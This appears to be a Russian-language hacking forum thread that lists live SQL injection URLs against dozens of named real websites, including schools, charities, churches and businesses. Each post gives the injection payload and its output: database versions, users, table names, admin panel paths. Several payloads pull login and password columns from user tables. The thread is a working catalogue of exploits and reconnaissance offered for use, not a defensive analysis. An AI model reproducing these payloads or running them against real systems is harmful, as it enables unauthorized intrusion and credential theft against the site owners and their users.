http://www.polihim.info/products/list.php?id=13-13%20UNION+SELECT%20concat_ws(0x3a,login,password)%20FROM+polihim.access-- Выводит логин и пароль =) (выкладывать правила запрещают =)) И если поковырять то можно еще хеш от форума вобловского отрыть... Админка: http://www.polihim.info/adm/ Ах да. Version: 5.0.77 name: polihim User name: art@localhost
Code: http://www.stvasilios.org/news/article.php?id=-580+union+select+1,version(),3,4,5/* Database Version: 5.0.45-community-nt Database name: stvasilios User name: [email protected]
mssqli Code: http://www.tuoteuutiset.fi/info.cfm/id/38/mag/2+or+1=@@version-- version() db_name() [tuxml] system_user [www] tables: Code: bannerJoin brand additionalNews company companyBrandJoin companyDescription companyDigital companyDigitalLog companyEmail companyInfo companyJoin companyProductTypeJoin companySearch companyUrl companyWhitePaper contact contactCompany customerEmailFailed customerEmails dtproperties event eventJoin expertArticle holddups infoBase infoBaseJoin infoBaseRows itemViews keyaccount link linkGroup linkGroupJoin linkJoin magazine magazineIssues magazineOrders news newsJoin newsletter newsProductTypeJoin nimppari pdf picture product productClass productClassJoin productData productJoin productProductTypeJoin productProductTypeJoinHoldKey productType productTypeJoin rating spotNews spotNewsGroup spotNewsJoin sysconstraints =================================== Code: http://www.proventilation.com/products/productDetail.asp?id=9+or+1=@@version-- version() db_name() [uniwashInc] system_user [uniwashInc] tables: Code: tblRepLogin D99_Tmp dtproperties FORUM_A_REPLY FORUM_A_TOPICS FORUM_ALLOWED_MEMBERS FORUM_BADWORDS FORUM_CATEGORY FORUM_CONFIG_NEW FORUM_FORUM FORUM_GROUP_NAMES FORUM_GROUPS FORUM_MEMBERS FORUM_MEMBERS_PENDING FORUM_MODERATOR FORUM_NAMEFILTER FORUM_REPLY FORUM_SUBSCRIPTIONS FORUM_TOPICS FORUM_TOTALS MSysCompactError sysconstraints syssegments tblActualApplication tblApplication tblApplicationMachine tblApplicationType tblBullets tblComments tblCustomer tblCustomModel tblDetail tblDrawings tblItemList tblItemListTemp tblItemXref tblLinks tblLogin tblMemberships tblMisc tblModel tblModel2 tblNewProduct tblProductAppXref tblProductHeader tblProducts tblProductType tblProductTypes tblProductXref tblProImage tblQuote tblQuoteModel tblQuoteOption tblRepCustomer tblRepEmail tblRepModelXref tblSalesData tblSalesData2 tblTestamonials tblTradeShows tblUBEmail Code: http://www.proventilation.com/products/productDetail.asp?id=9+or+1=(select+top+1+cast(id+as+nvarchar)%2B%27%3A%27%2Bcast(firstName+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+tblLogin)-- Code: http://www.proventilation.com/products/productDetail.asp?id=9+or+1=(select+top+1+cast(ID+as+nvarchar)%2B%27%3A%27%2Bcast(userName+as+nvarchar)%2B%27%3A%27%2Bcast(passwords+as+nvarchar)+from+tblRepLogin)-- =================================== Code: http://www.auspirit.com/au/aspirit/productdetail.asp?ID=40+or+1=@@version-- version() db_name() [vs112407_1] system_user [vs112407_1_dbo] tables: Code: tliBannerInstance tblMMClickThru tliSeminarDate AusSpirit dtproperties SASImport SASImportold sysconstraints syssegments tblMMAccountFields tblMMAccounts tblMMAdminRights tblMMAdminSections tblMMClient tblMMFieldContent tblMMFieldTypes tblMMImailHistory tblMMScheduleSend tblMMStat tblMMTemplates tblMMUsers tblREmailAdministrators tblREmailMemberVariants tblREmailServiceMembers tblRVariantContent tblRVariantTypes tldImail1_1ContentFolder tldImail1_1DataBase tldImail1_1EmailContent tldImail1_1MailQue tldImail1_1Members tldImail2_2ContentFolder tldImail2_2DataBase tldImail2_2EmailContent tldImail2_2MailQue tldImail2_2Members tliAdministrator tliAdvertisement tliAffiliate tliAffiliateReference tliAPTMSCompany tliAPTMSLocation tliAPTMSProduct tliAuctionBids tliAuctionCategory tliAuctionClient tliAuctioneerPermission tliAuctionFeedback tliAuctionIncrement tliAuctionItem tliAuctionMessage tliAuctionOrder tliBanner tliBannerPosition tliBannerTemplate tliBannerType tliBidType tliBlog tliBlogComment tliBranchDomain tliBrand tliCartCustomer tliCartOrder tliCartPayment tliCategory tliContentItem tliContentType tliCourse tliCruiseBooking tliCruiseCrew tliCruiseDate tliCruiseSchedule tliCurrencyConverter tliDataPage tliDataPageState tliEMailClickThrough tliEMailContent tliEMailContentInstance tliEMailDump tliEMailQue tliEMailTemplate tliEvent tliExchangeRates tliForum tliForumComment tliForumThread tliForumTopic tliForumUser tliGeneralPage tliGeneralPageCategory tliGMTDestination tliGMTProduct tliImailEmail tliImailEmailPart tliIndigoMenuItem tliIndigoSummaryItem tliIndigoSummaryItemButton tliIndigoSummaryItemEntry tliItinerary tliLawFirm tliMember tliMemberExpertise tliMemberGroup =================================== Code: http://www.chemdot.com/productdetail.cfm?id=288+or+1=@@version-- version() db_name() [chemdot] system_user [NT AUTHORITY\SYSTEM] tables: Code: REFERENTIAL_CONSTRAINTS CHECK_CONSTRAINTS admin =================================== Code: http://www.sooknet.com/technology/news.cfm?ID=5620+or+1=@@version-- version() db_name() [sooknet2] system_user [itssook]
http://www.buddhistac.org/nkn_include/nknfiledn.php?uid=1+union+select+aes_decrypt(aes_e ncrypt(concat_ws(0x2a,version(),user(),database()) ,0x71),0x71),2,3,4,5 5.0.27 budac@localhost budac http://www.ndt.net/search/docs.php3?id=7516+union+select+concat_ws(0x2a,version(),user(),database())+limit+1,1/* 5.0.24 nondestructive@localhost ndtnet
http://www.olehouse.ru/gost/vid.php?id=-771%20union%20select%201,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16-- 4 версия
Code: http://www.riai.ie/?id=-5755+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9-- bh002:5.0.45-community-log:[email protected] Code: http://www.x-trapromo.gr/category.php?id=-20+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4-- x_trap_phpbb:5.0.32-Debian_7etch8:xtra@localhost Code: http://psea.eu/index.php?id=-5+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,database(),version(),user()),9,10,11,12,13,14,15-- pseaeu_psea:5.0.81-community: pseaeu_axtinog@localhost
Code: http://www.csa.edu.au/staff_bio.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+--+ 5.0.82-msl-usrs-sure2-log:csaadmin@localhost ТИЦ: 0 PR: 6 На антибоян проверял Google'ом
http://nilespring.com/girl.php?id=-137%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables-- Опять порнуха..
Code: http://www.aramis-london-escorts.co.uk/girl.php?s=elite&id=-25+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6 Database Version: 5.0.67-log Лондонский бардель Проверял на антибоян Гуглом
http://www.stphilips.org.au/staff_bio.php?id=-40%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17-- 4.1.22-standard
http://www.cempre.org.uy/pages/noticia.php?id=-76+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11-- tangram0_cempre@localhost:tangram0_cempre:5.0.67-community http://www.tiendadigital.com.uy/cuentale.php?Accion=Producto&Id=-76+union+select+1,concat_Ws(0x3a,user(),database(),version()),3-- [email protected]:tiendadigital:5.0.67-log http://www.saico.com.uy/noticia.php?id=76'+and+substring(version(),1,1)=3/* 3-ветка http://www.inmobiliariaps.com.uy/imprimir.php?id=-76+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84-- 5.0.81-community
Code: http://www.subba-culture.com/competitions.php?id=-1075+union+select+1,password,3,4,5,6,7,8,9,0,1,2,13+from+users/* Database Version: 4.0.27-max-log Database name: db131994193 User name: [email protected] ------------------------------------------------------------------------------------------------------------------- Code: http://maindata.info/index.php?id=-24+union+select+version()+from+users/* Database Version: 4.0.27-standard Database name: maindatask User name: [email protected]
http://itjapan.chosun.com/viewPopupInfo.do?idx=1+union+select+1,2,concat_ws(0x2a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14 5.0.45-log academy@localhost academy -------------------------------------------------------------------------------------------------------------------- http://www.st-johann-erding.de/index.php?page_id=46+union+select+concat_ws(0x3a,version(),user(),database())/* 4.1.22 10031_sismedia@localhost 10031_sismedia -------------------------------------------------------------------------------------------------------------------- http://www.digitalsignagetoday.com/product_cat_search.php?cat=1+union+select+1,concat(0x2,version(),user(),database()),3,4,5,6,7/* 5.0.45atmmarketplace@localhostsitedb
Code: http://www.wemu.org/hosts.php?id=-38+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9/* Database Version: 4.1.22-max-log Database name: wemufm User name: [email protected] Code: http://vologda-address.ru/index.php?cat=31&subcat=781+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/* Database Version: 5.0.26-log Database name: davletshin_volog User name: davletshin_volog@localhost
http://www.green-furniture.ca/item_details.php?id=-76+union+select+1,2,3,4,concat_Ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13--&name=GF-S26+Sofa greenfuri@localhost:ricknel_greenfur:5.0.83 http://iidx.jp/gf/req/view.php?id=76+union+select+1,2,3,4,concat_Ws(0x3a,user(),database(),version()),6,7-- excelion@localhost:excelion:4.0.27-standard
http://www.watercampus.com/index.php?menu_item_id=11+union+select+concat(0x2,version(),user(),database())+limit+1,1 5.0.37-community-ntwww@localhostwatercampws
http://lumion.ru/low.php?id=9-9%20union%20select%201,2,3,4,concat_ws(0x3a,id,user,pass)%20from%20userlist%20limit%200,1-- Админку не нашел...
